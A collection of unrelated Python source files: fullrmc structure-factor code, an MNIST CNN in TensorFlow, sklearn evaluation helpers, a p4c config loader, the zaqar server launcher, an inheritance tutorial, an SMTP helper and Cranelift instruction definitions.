#. relativeIndex (numpy.ndarray): Not used here.
"""
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
def _on_collector_collect_atom(self, realIndex):
pass
def _on_collector_release_atom(self, realIndex):
pass
def _constraint_copy_needs_lut(self):
return {'_StructureFactorConstraint__elementsPairs' :'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__histogramSize' :'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__weightingScheme' :'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__shellVolumes' :'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__shellCenters' :'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__windowFunction' :'_StructureFactorConstraint__windowFunction',
'_StructureFactorConstraint__experimentalQValues' :'_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF' :'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__Gr2SqMatrix' :'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__minimumDistance' :'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance' :'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin' :'_StructureFactorConstraint__bin',
'_ExperimentalConstraint__scaleFactor' :'_ExperimentalConstraint__scaleFactor',
'_ExperimentalConstraint__dataWeights' :'_ExperimentalConstraint__dataWeights',
'_ExperimentalConstraint__multiframePrior' :'_ExperimentalConstraint__multiframePrior',
'_ExperimentalConstraint__multiframeWeight' :'_ExperimentalConstraint__multiframeWeight',
'_ExperimentalConstraint__limits' :'_ExperimentalConstraint__limits',
'_ExperimentalConstraint__limitsIndexStart' :'_ExperimentalConstraint__limitsIndexStart',
'_ExperimentalConstraint__limitsIndexEnd' :'_ExperimentalConstraint__limitsIndexEnd',
'_Constraint__used' :'_Constraint__used',
'_Constraint__data' :'_Constraint__data',
'_Constraint__state' :'_Constraint__state',
'_Constraint__standardError' :'_Constraint__standardError',
'_fittedScaleFactor' :'_fittedScaleFactor',
'_usedDataWeights' :'_usedDataWeights',
'_Engine__state' :'_Engine__state',
'_Engine__boxCoordinates' :'_Engine__boxCoordinates',
'_Engine__basisVectors' :'_Engine__basisVectors',
'_Engine__isPBC' :'_Engine__isPBC',
'_Engine__moleculesIndex' :'_Engine__moleculesIndex',
'_Engine__elementsIndex' :'_Engine__elementsIndex',
'_Engine__numberOfAtomsPerElement' :'_Engine__numberOfAtomsPerElement',
'_Engine__elements' :'_Engine__elements',
'_Engine__numberDensity' :'_Engine__numberDensity',
'_Engine__volume' :'_Engine__volume',
'_Engine__realCoordinates' :'_Engine__realCoordinates',
'_atomsCollector' :'_atomsCollector',
('engine','_atomsCollector') :'_atomsCollector',
}
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters.
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
class ReducedStructureFactorConstraint(StructureFactorConstraint):
"""
The Reduced Structure Factor, which we will also denote S(Q),
is exactly the same quantity as the Structure Factor, with the
slight difference that it is normalized to 0 rather than 1,
and therefore :math:`<S(Q)>=0`.
The computation of S(Q) is done through a sine inverse Fourier
transform of the computed pair distribution function G(r).
.. math::
S(Q) = \\frac{1}{Q} \\int_{0}^{\\infty} G(r) \\sin(Qr) dr
The Reduced Structure Factor is implemented mainly because many
experimental data sets are provided in this form, and it is
convenient not to transform the experimental data every time.
"""
def _get_Sq_from_Gr(self, Gr):
return np.sum(Gr.reshape((-1,1))*self.Gr2SqMatrix, axis=0)
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*Sq
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
""" dummy overload that does exactly the same thing
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData, modelData, dataWeights)
return SF
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)-1$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters.
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
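# A minimal numpy sketch (illustrative only, not part of fullrmc) of the
# discretized sine Fourier transform documented above. It builds a matrix
# analogous to Gr2SqMatrix so that Sq = Gr.dot(matrix), as in
# _get_Sq_from_Gr. The grid values and bin width are assumptions.
def _example_gr_to_sq_matrix(rValues, qValues, dr):
    import numpy as np
    # matrix[i, j] ~ sin(q_j * r_i) * dr / q_j, one column per Q point
    return np.sin(np.outer(rValues, qValues)) * dr / qValues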
|
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('mnist_data',one_hot=True)
batch_size = 100
n_batch = mnist.train.num_examples // batch_size
def weight_variable(shape):
initial = tf.truncated_normal(shape,stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1,shape=shape)
return tf.Variable(initial)
def conv2d(x,W):
return tf.nn.conv2d(x,W,strides=[1,1,1,1],padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')
x = tf.placeholder(tf.float32,[None,784])
y = tf.placeholder(tf.float32,[None,10])
x_image = tf.reshape(x,[-1,28,28,1])
W_conv1 = weight_variable([5,5,1,32])
b_conv1 = bias_variable([32])
h_conv1 = tf.nn.relu(conv2d(x_image,W_conv1) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
W_conv2 = weight_variable([5,5,32,64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1,W_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
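# Shape bookkeeping: each conv uses SAME padding (spatial size preserved),
# and each 2x2 max-pool halves it: 28x28 -> 14x14 -> 7x7, with 64 feature
# maps after the second block, hence the 7*7*64 flattened size below.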
W_fc1 = weight_variable([7*7*64,1024])
b_fc1 = bias_variable([1024])
h_pool2_flat = tf.reshape(h_pool2,[-1,7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat,W_fc1) + b_fc1)
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1,keep_prob)
W_fc2 = weight_variable([1024,10])
b_fc2 = bias_variable([10])
logits = tf.matmul(h_fc1_drop,W_fc2) + b_fc2
prediction = tf.nn.softmax(logits)
# the loss expects raw logits; feeding softmax output would apply softmax twice
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=logits))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(prediction,1),tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for epoch in range(51):
for batch in range(n_batch):
batch_xs,batch_ys = mnist.train.next_batch(batch_size)
sess.run(train_step,feed_dict={x:batch_xs,y:batch_ys,keep_prob:0.8})
test_acc = sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels,keep_prob:1.0})
print "Iter " + str(epoch) + ", Testing Accuracy= " + str(test_acc)
|
# import packages
import matplotlib; matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from sklearn.feature_selection import chi2
from sklearn.metrics import roc_auc_score, roc_curve, auc, precision_score, f1_score, mean_squared_error, accuracy_score
# report coefficients
def coef(model, X, X_train, y_train):
df_coef = pd.DataFrame(list(zip(X.columns, model.coef_.ravel())))
score, pvalues = chi2(X_train, y_train)
df_coef['p-value'] = pvalues
df_coef = df_coef.rename(columns = {0:'feature', 1:'coefficient'})
# intercept
df_intercept = pd.DataFrame(data=model.intercept_,
index=[0],
columns=['coefficient'])
df_intercept['feature'] = 'Intercept'
df_intercept = df_intercept[['feature', 'coefficient']]
df_coef.update(df_intercept)
df_coef['intercept'] = df_coef.iloc[0,1]
df_coef = df_coef[df_coef['feature'] != 'Intercept']
df_coef['log_odds'] = df_coef['intercept'] + df_coef['coefficient']
df_coef['odds'] = np.exp(df_coef['log_odds'])
df_coef['probability'] = df_coef['odds'] / (1 + df_coef['odds'])
df_coef.sort_values('probability', ascending=False, inplace=True)
return df_coef
# report predictions
def pred(model, X, y, df_offenses):
df_pred = X.copy()  # copy so the caller's frame is not mutated
df_pred['predicted'] = model.predict(X)
df_pred['actual'] = y
df_pred['spn'] = df_offenses['SPN']
return df_pred
# report accuracy
def accuracy(model, X_test, y_test):
accuracy_model = model.score(X_test, y_test)
accuracy_baseline = 1-y_test.mean()
accuracy_change = accuracy_model - accuracy_baseline
df_accuracy = pd.DataFrame({'Baseline Accuracy': [accuracy_baseline],
'Model Accuracy': [accuracy_model],
'Change in Accuracy': [accuracy_change]})
df_accuracy['Baseline Accuracy'] = round(df_accuracy['Baseline Accuracy'],2)
df_accuracy['Model Accuracy'] = round(df_accuracy['Model Accuracy'],2)
df_accuracy['Change in Accuracy'] = round(df_accuracy['Change in Accuracy'],2)
# ROC (rank with predicted probabilities rather than hard labels;
# assumes the model exposes predict_proba, as LogisticRegression does)
y_true = y_test
y_pred = model.predict(X_test)
y_score = model.predict_proba(X_test)[:, 1]
df_accuracy['roc_auc_score'] = round(
roc_auc_score(y_true, y_score)
,2)
fpr, tpr, threshold = roc_curve(y_true, y_score)
roc_auc = auc(fpr, tpr)
plt.figure()
plt.title('Receiver Operating Characteristic')
plt.plot(fpr, tpr, 'b', label = 'AUC = %0.2f' % roc_auc)
plt.legend(loc = 'lower right')
plt.plot([0, 1], [0, 1],'r--')
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
plt.savefig('plot_roc.png')
plt.close()  # free the figure so repeated calls don't overlay curves
# precision score
df_accuracy['precision_score'] = round(
precision_score(y_true, y_pred)
,2)
# f1 score
df_accuracy['f1_score'] = round(
f1_score(y_true, y_pred)
,2)
# mean squared error
df_accuracy['mean_squared_error'] = round(
mean_squared_error(y_true, y_pred)
,2)
# accuracy score
df_accuracy['accuracy_score'] = round(
accuracy_score(y_true, y_pred)
,2)
return df_accuracy
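# Self-contained smoke test with synthetic data (the data and the use of
# LogisticRegression are assumptions; the real pipeline supplies its own
# features, labels and df_offenses elsewhere).
if __name__ == '__main__':
    from sklearn.linear_model import LogisticRegression
    from sklearn.model_selection import train_test_split
    rng = np.random.RandomState(0)
    X_demo = pd.DataFrame(rng.rand(200, 3), columns=['f1', 'f2', 'f3'])
    y_demo = pd.Series((X_demo['f1'] + 0.5*rng.rand(200) > 0.75).astype(int))
    X_tr, X_te, y_tr, y_te = train_test_split(X_demo, y_demo, random_state=0)
    model = LogisticRegression().fit(X_tr, y_tr)
    print(accuracy(model, X_te, y_te))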
|
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import sys
import os
class Config(object):
"""
Config - Configuration data for a 'p4c' tool chain.
The common configuration includes the argument parser and the path to the
backend configuration file.
"""
def __init__(self, config_prefix):
self.config_prefix = config_prefix or 'p4c'
self.target = []
def load_from_config(self, path, argParser):
cfg_globals = dict(globals())
cfg_globals['config'] = self
cfg_globals['__file__'] = path
cfg_globals['argParser'] = argParser
data = None
try:
    with open(path) as f:
        data = f.read()
except IOError as e:
    print("error reading %s: %s" % (path, e))
    return
try:
exec(compile(data, path, 'exec'), cfg_globals, None)
except SystemExit:
e = sys.exc_info()[1]
if e.args:
raise
except Exception:
    import traceback
    print(traceback.format_exc())
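# Hypothetical usage sketch (the config file path comes from the command
# line; nothing below is part of the p4c driver itself).
if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser()
    cfg = Config('p4c')
    if len(sys.argv) > 1:
        cfg.load_from_config(sys.argv[1], parser)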
|
# Copyright (c) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from oslo_config import cfg
from oslo_log import log
from oslo_reports import guru_meditation_report as gmr
from oslo_reports import opts as gmr_opts
from zaqar import bootstrap
from zaqar.common import cli
from zaqar.conf import default
from zaqar import version
# NOTE(eggmaster): define command line options for zaqar-server
_CLI_OPTIONS = (
default.admin_mode,
cfg.BoolOpt('daemon', default=False,
help='Run Zaqar server in the background.'),
)
@cli.runnable
def run():
# Use the global CONF instance
conf = cfg.CONF
gmr_opts.set_defaults(conf)
# NOTE(eggmaster): register command line options for zaqar-server
conf.register_cli_opts(_CLI_OPTIONS)
log.register_options(conf)
# NOTE(jeffrey4l): Overwrite the default value for
# logging_context_format_string. Add project_id into it.
conf.set_default('logging_context_format_string',
'%(asctime)s.%(msecs)03d %(process)d %(levelname)s'
' %(name)s [%(request_id)s %(user_identity)s]'
' [project_id:%(project_id)s] %(message)s')
conf(project='zaqar', prog='zaqar-server')
log.setup(conf, 'zaqar')
gmr.TextGuruMeditation.setup_autorun(version, conf=conf)
server = bootstrap.Bootstrap(conf)
# The following code is to daemonize zaqar-server to avoid
# an issue with wsgiref writing to stdout/stderr when we don't
# want it to. This is specifically needed to allow zaqar to
# run under devstack, but it may also be useful for other scenarios.
# Open /dev/zero and /dev/null for redirection.
# Daemonizing zaqar-server is needed *just* when running under devstack
# and when zaqar is invoked with `daemon` command line option.
if conf.daemon:
zerofd = os.open('/dev/zero', os.O_RDONLY)
nullfd = os.open('/dev/null', os.O_WRONLY)
# Close the stdthings and reassociate them with a non terminal
os.dup2(zerofd, 0)
os.dup2(nullfd, 1)
os.dup2(nullfd, 2)
# Detach process context, this requires 2 forks.
try:
pid = os.fork()
if pid > 0:
os._exit(0)
except OSError:
os._exit(1)
try:
pid = os.fork()
if pid > 0:
os._exit(0)
except OSError:
os._exit(2)
server.run()
|
# Created by PyCharm Pro Edition
# User: Kaushik Talukdar
# Date: 24-04-17
# Time: 12:29 AM
# INHERITANCE
# We can create a new class, but instead of writing it from scratch, we can base it on an existing class.
# Let's understand inheritance better with an example
class Car():
def __init__(self, make, model, year):
self.make = make
self.model = model
self.year = year
self.mileage = 0
def get_descriptive_name(self):
full_name = self.make.title() + ' ' + self.model.title() + ' ' + str(self.year)
return full_name
def update_odometer(self, mileage):
self.mileage = mileage
# The class below is derived from Car and has access to Car's attributes as well as its methods
# The parent class name must appear in parentheses in the child class for inheritance to work
# the super() call gives the child class access to the parent class's attributes and methods
class ElectricCar(Car):
def __init__(self, make, model, year):
super().__init__(make, model, year)
my_car = ElectricCar('Tesla', 'Model S', '2017')
car = my_car.get_descriptive_name()
print(car)
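# Building on the example above: a child class can also add attributes and
# methods of its own. The battery_size value below is purely illustrative.
class BatteryElectricCar(ElectricCar):
    def __init__(self, make, model, year, battery_size=75):
        super().__init__(make, model, year)
        self.battery_size = battery_size
    def describe_battery(self):
        print("This car has a " + str(self.battery_size) + "-kWh battery.")
my_bev = BatteryElectricCar('Tesla', 'Model 3', 2018)
print(my_bev.get_descriptive_name())
my_bev.describe_battery()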
|
import config
import smtplib
from contextlib import contextmanager
@contextmanager
def smtp_server():
server = smtplib.SMTP(config.lookup("smtp.server"))
def activate_tls():
server.starttls()
security = config.lookup("smtp.security")
if security:
{
"tls": activate_tls,
}[security]()
username = config.lookup("smtp.username")
password = config.lookup("smtp.password")
server.login(username, password)
try:
    yield server
finally:
    server.quit()  # always close the connection, even if the caller raises
def has_email_headers(message, require=("Subject",)):  # trailing comma: ("Subject") is just a string
lines = message.splitlines()
try:
header_terminator_index = lines.index("")
except ValueError:
return False
headers = lines[:header_terminator_index]
unmet = set(require)
for header in headers:
if ":" not in header:
return False
next_unmet = set()
for req in unmet:
if req not in header:
next_unmet.add(req)
unmet = next_unmet
return not unmet
def format_email_headers(headers):
return "".join(["{}: {}\n".format(k,v) for k, v in headers.items()])
def emailify(message):
if has_email_headers(message):
return message
first_line = message.splitlines()[0]
subject = first_line[:60]
if subject != first_line:
subject += "..."
headers = {
"Subject": subject
}
return "\n".join([format_email_headers(headers), message])
def send_message(message, recipient="default"):
target = config.lookup(["recipients", recipient, "email"])
sender = config.lookup("smtp.from") or config.lookup("smtp.username")
message = emailify(message)
with smtp_server() as server:
server.sendmail(sender, target, message)
if __name__ == '__main__':
import sample
sample.send_sample_message(send_message)
|
"""
Cranelift base instruction set.
This module defines the basic Cranelift instruction set that all targets
support.
"""
from __future__ import absolute_import
from cdsl.operands import Operand, VARIABLE_ARGS
from cdsl.typevar import TypeVar
from cdsl.instructions import Instruction, InstructionGroup
from base.types import f32, f64, b1, iflags, fflags
from base.immediates import imm64, uimm8, uimm32, ieee32, ieee64, offset32
from base.immediates import boolean, intcc, floatcc, memflags, regunit
from base.immediates import trapcode
from base import entities
from cdsl.ti import WiderOrEq
import base.formats # noqa
GROUP = InstructionGroup("base", "Shared base instruction set")
Int = TypeVar('Int', 'A scalar or vector integer type', ints=True, simd=True)
Bool = TypeVar('Bool', 'A scalar or vector boolean type',
bools=True, simd=True)
iB = TypeVar('iB', 'A scalar integer type', ints=True)
iAddr = TypeVar('iAddr', 'An integer address type', ints=(32, 64))
Testable = TypeVar(
'Testable', 'A scalar boolean or integer type',
ints=True, bools=True)
TxN = TypeVar(
'TxN', 'A SIMD vector type',
ints=True, floats=True, bools=True, scalars=False, simd=True)
Any = TypeVar(
'Any', 'Any integer, float, or boolean scalar or vector type',
ints=True, floats=True, bools=True, scalars=True, simd=True)
Mem = TypeVar(
'Mem', 'Any type that can be stored in memory',
ints=True, floats=True, simd=True)
MemTo = TypeVar(
'MemTo', 'Any type that can be stored in memory',
ints=True, floats=True, simd=True)
addr = Operand('addr', iAddr)
#
# Control flow
#
c = Operand('c', Testable, doc='Controlling value to test')
Cond = Operand('Cond', intcc)
x = Operand('x', iB)
y = Operand('y', iB)
EBB = Operand('EBB', entities.ebb, doc='Destination extended basic block')
args = Operand('args', VARIABLE_ARGS, doc='EBB arguments')
jump = Instruction(
'jump', r"""
Jump.
Unconditionally jump to an extended basic block, passing the specified
EBB arguments. The number and types of arguments must match the
destination EBB.
""",
ins=(EBB, args), is_branch=True, is_terminator=True)
fallthrough = Instruction(
'fallthrough', r"""
Fall through to the next EBB.
This is the same as :inst:`jump`, except the destination EBB must be
the next one in the layout.
Jumps are turned into fall-through instructions by the branch
relaxation pass. There is no reason to use this instruction outside
that pass.
""",
ins=(EBB, args), is_branch=True, is_terminator=True)
brz = Instruction(
'brz', r"""
Branch when zero.
If ``c`` is a :type:`b1` value, take the branch when ``c`` is false. If
``c`` is an integer value, take the branch when ``c = 0``.
""",
ins=(c, EBB, args), is_branch=True)
brnz = Instruction(
'brnz', r"""
Branch when non-zero.
If ``c`` is a :type:`b1` value, take the branch when ``c`` is true. If
``c`` is an integer value, take the branch when ``c != 0``.
""",
ins=(c, EBB, args), is_branch=True)
br_icmp = Instruction(
'br_icmp', r"""
Compare scalar integers and branch.
Compare ``x`` and ``y`` in the same way as the :inst:`icmp` instruction
and take the branch if the condition is true::
br_icmp ugt v1, v2, ebb4(v5, v6)
is semantically equivalent to::
v10 = icmp ugt, v1, v2
brnz v10, ebb4(v5, v6)
Some RISC architectures like MIPS and RISC-V provide instructions that
implement all or some of the condition codes. The instruction can also
be used to represent *macro-op fusion* on architectures like Intel's.
""",
ins=(Cond, x, y, EBB, args), is_branch=True)
f = Operand('f', iflags)
brif = Instruction(
'brif', r"""
Branch when condition is true in integer CPU flags.
""",
ins=(Cond, f, EBB, args), is_branch=True)
Cond = Operand('Cond', floatcc)
f = Operand('f', fflags)
brff = Instruction(
'brff', r"""
Branch when condition is true in floating point CPU flags.
""",
ins=(Cond, f, EBB, args), is_branch=True)
x = Operand('x', iB, doc='index into jump table')
Entry = TypeVar('Entry', 'A scalar integer type', ints=True)
entry = Operand('entry', Entry, doc='entry of jump table')
JT = Operand('JT', entities.jump_table)
br_table = Instruction(
'br_table', r"""
Indirect branch via jump table.
Use ``x`` as an unsigned index into the jump table ``JT``. If a jump
table entry is found, branch to the corresponding EBB. If no entry was
found or the index is out-of-bounds, branch to the given default EBB.
Note that this branch instruction can't pass arguments to the targeted
blocks. Split critical edges as needed to work around this.
Do not confuse this with "tables" in WebAssembly. ``br_table`` is for
jump tables with destinations within the current function only -- think
of a ``match`` in Rust or a ``switch`` in C. If you want to call a
function in a dynamic library, that will typically use
``call_indirect``.
""",
ins=(x, EBB, JT), is_branch=True, is_terminator=True)
Size = Operand('Size', uimm8, 'Size in bytes')
jump_table_entry = Instruction(
'jump_table_entry', r"""
Get an entry from a jump table.
Load a serialized ``entry`` from a jump table ``JT`` at a given index
``addr`` with a specific ``Size``. The retrieved entry may need to be
decoded after loading, depending upon the jump table type used.
Currently, the only type supported is entries which are relative to the
base of the jump table.
""",
ins=(x, addr, Size, JT), outs=entry)
jump_table_base = Instruction(
'jump_table_base', r"""
Get the absolute base address of a jump table.
This is used for jump tables wherein the entries are stored relative to
the base of jump table. In order to use these, generated code should first
load an entry using ``jump_table_entry``, then use this instruction to add
the relative base back to it.
""",
ins=JT, outs=addr)
indirect_jump_table_br = Instruction(
'indirect_jump_table_br', r"""
Branch indirectly via a jump table entry.
Unconditionally jump via a jump table entry that was previously loaded
with the ``jump_table_entry`` instruction.
""",
ins=(addr, JT),
is_branch=True, is_indirect_branch=True, is_terminator=True)
debugtrap = Instruction('debugtrap', r"""
Encodes an assembly debug trap.
""", can_load=True, can_store=True, other_side_effects=True)
code = Operand('code', trapcode)
trap = Instruction(
'trap', r"""
Terminate execution unconditionally.
""",
ins=code, is_terminator=True, can_trap=True)
trapz = Instruction(
'trapz', r"""
Trap when zero.
If ``c`` is non-zero, execution continues at the following instruction.
""",
ins=(c, code), can_trap=True)
trapnz = Instruction(
'trapnz', r"""
Trap when non-zero.
If ``c`` is zero, execution continues at the following instruction.
""",
ins=(c, code), can_trap=True)
Cond = Operand('Cond', intcc)
f = Operand('f', iflags)
trapif = Instruction(
'trapif', r"""
Trap when condition is true in integer CPU flags.
""",
ins=(Cond, f, code), can_trap=True)
Cond = Operand('Cond', floatcc)
f = Operand('f', fflags)
trapff = Instruction(
'trapff', r"""
Trap when condition is true in floating point CPU flags.
""",
ins=(Cond, f, code), can_trap=True)
rvals = Operand('rvals', VARIABLE_ARGS, doc='return values')
x_return = Instruction(
'return', r"""
Return from the function.
Unconditionally transfer control to the calling function, passing the
provided return values. The list of return values must match the
function signature's return types.
""",
ins=rvals, is_return=True, is_terminator=True)
fallthrough_return = Instruction(
'fallthrough_return', r"""
Return from the function by fallthrough.
This is a specialized instruction for use where one wants to append
a custom epilogue, which will then perform the real return. This
instruction has no encoding.
""",
ins=rvals, is_return=True, is_terminator=True)
FN = Operand(
'FN',
entities.func_ref,
doc='function to call, declared by :inst:`function`')
args = Operand('args', VARIABLE_ARGS, doc='call arguments')
call = Instruction(
'call', r"""
Direct function call.
Call a function which has been declared in the preamble. The argument
types must match the function's signature.
""",
ins=(FN, args), outs=rvals, is_call=True)
SIG = Operand('SIG', entities.sig_ref, doc='function signature')
callee = Operand('callee', iAddr, doc='address of function to call')
call_indirect = Instruction(
'call_indirect', r"""
Indirect function call.
Call the function pointed to by `callee` with the given arguments. The
called function must match the specified signature.
Note that this is different from WebAssembly's ``call_indirect``; the
callee is a native address, rather than a table index. For WebAssembly,
:inst:`table_addr` and :inst:`load` are used to obtain a native address
from a table.
""",
ins=(SIG, callee, args), outs=rvals, is_call=True)
func_addr = Instruction(
'func_addr', r"""
Get the address of a function.
Compute the absolute address of a function declared in the preamble.
The returned address can be used as a ``callee`` argument to
:inst:`call_indirect`. This is also a method for calling functions that
are too far away to be addressable by a direct :inst:`call`
instruction.
""",
ins=FN, outs=addr)
#
# Memory operations
#
SS = Operand('SS', entities.stack_slot)
Offset = Operand('Offset', offset32, 'Byte offset from base address')
x = Operand('x', Mem, doc='Value to be stored')
a = Operand('a', Mem, doc='Value loaded')
p = Operand('p', iAddr)
MemFlags = Operand('MemFlags', memflags)
args = Operand('args', VARIABLE_ARGS, doc='Address arguments')
load = Instruction(
'load', r"""
Load from memory at ``p + Offset``.
This is a polymorphic instruction that can load any value type which
has a memory representation.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
load_complex = Instruction(
'load_complex', r"""
Load from memory at ``sum(args) + Offset``.
This is a polymorphic instruction that can load any value type which
has a memory representation.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
store = Instruction(
'store', r"""
Store ``x`` to memory at ``p + Offset``.
This is a polymorphic instruction that can store any value type with a
memory representation.
""",
ins=(MemFlags, x, p, Offset), can_store=True)
store_complex = Instruction(
'store_complex', r"""
Store ``x`` to memory at ``sum(args) + Offset``.
This is a polymorphic instruction that can store any value type with a
memory representation.
""",
ins=(MemFlags, x, args, Offset), can_store=True)
iExt8 = TypeVar(
'iExt8', 'An integer type with more than 8 bits',
ints=(16, 64))
x = Operand('x', iExt8)
a = Operand('a', iExt8)
uload8 = Instruction(
'uload8', r"""
Load 8 bits from memory at ``p + Offset`` and zero-extend.
This is equivalent to ``load.i8`` followed by ``uextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
uload8_complex = Instruction(
'uload8_complex', r"""
Load 8 bits from memory at ``sum(args) + Offset`` and zero-extend.
This is equivalent to ``load.i8`` followed by ``uextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
sload8 = Instruction(
'sload8', r"""
Load 8 bits from memory at ``p + Offset`` and sign-extend.
This is equivalent to ``load.i8`` followed by ``sextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
sload8_complex = Instruction(
'sload8_complex', r"""
Load 8 bits from memory at ``sum(args) + Offset`` and sign-extend.
This is equivalent to ``load.i8`` followed by ``sextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
istore8 = Instruction(
'istore8', r"""
Store the low 8 bits of ``x`` to memory at ``p + Offset``.
This is equivalent to ``ireduce.i8`` followed by ``store.i8``.
""",
ins=(MemFlags, x, p, Offset), can_store=True)
istore8_complex = Instruction(
'istore8_complex', r"""
Store the low 8 bits of ``x`` to memory at ``sum(args) + Offset``.
This is equivalent to ``ireduce.i8`` followed by ``store.i8``.
""",
ins=(MemFlags, x, args, Offset), can_store=True)
iExt16 = TypeVar(
'iExt16', 'An integer type with more than 16 bits',
ints=(32, 64))
x = Operand('x', iExt16)
a = Operand('a', iExt16)
uload16 = Instruction(
'uload16', r"""
Load 16 bits from memory at ``p + Offset`` and zero-extend.
This is equivalent to ``load.i16`` followed by ``uextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
uload16_complex = Instruction(
'uload16_complex', r"""
Load 16 bits from memory at ``sum(args) + Offset`` and zero-extend.
This is equivalent to ``load.i16`` followed by ``uextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
sload16 = Instruction(
'sload16', r"""
Load 16 bits from memory at ``p + Offset`` and sign-extend.
This is equivalent to ``load.i16`` followed by ``sextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
sload16_complex = Instruction(
'sload16_complex', r"""
Load 16 bits from memory at ``sum(args) + Offset`` and sign-extend.
This is equivalent to ``load.i16`` followed by ``sextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
istore16 = Instruction(
'istore16', r"""
Store the low 16 bits of ``x`` to memory at ``p + Offset``.
This is equivalent to ``ireduce.i16`` followed by ``store.i16``.
""",
ins=(MemFlags, x, p, Offset), can_store=True)
istore16_complex = Instruction(
'istore16_complex', r"""
Store the low 16 bits of ``x`` to memory at ``sum(args) + Offset``.
This is equivalent to ``ireduce.i16`` followed by ``store.i16``.
""",
ins=(MemFlags, x, args, Offset), can_store=True)
iExt32 = TypeVar(
'iExt32', 'An integer type with more than 32 bits',
ints=(64, 64))
x = Operand('x', iExt32)
a = Operand('a', iExt32)
uload32 = Instruction(
'uload32', r"""
Load 32 bits from memory at ``p + Offset`` and zero-extend.
This is equivalent to ``load.i32`` followed by ``uextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
uload32_complex = Instruction(
'uload32_complex', r"""
Load 32 bits from memory at ``sum(args) + Offset`` and zero-extend.
This is equivalent to ``load.i32`` followed by ``uextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
sload32 = Instruction(
'sload32', r"""
Load 32 bits from memory at ``p + Offset`` and sign-extend.
This is equivalent to ``load.i32`` followed by ``sextend``.
""",
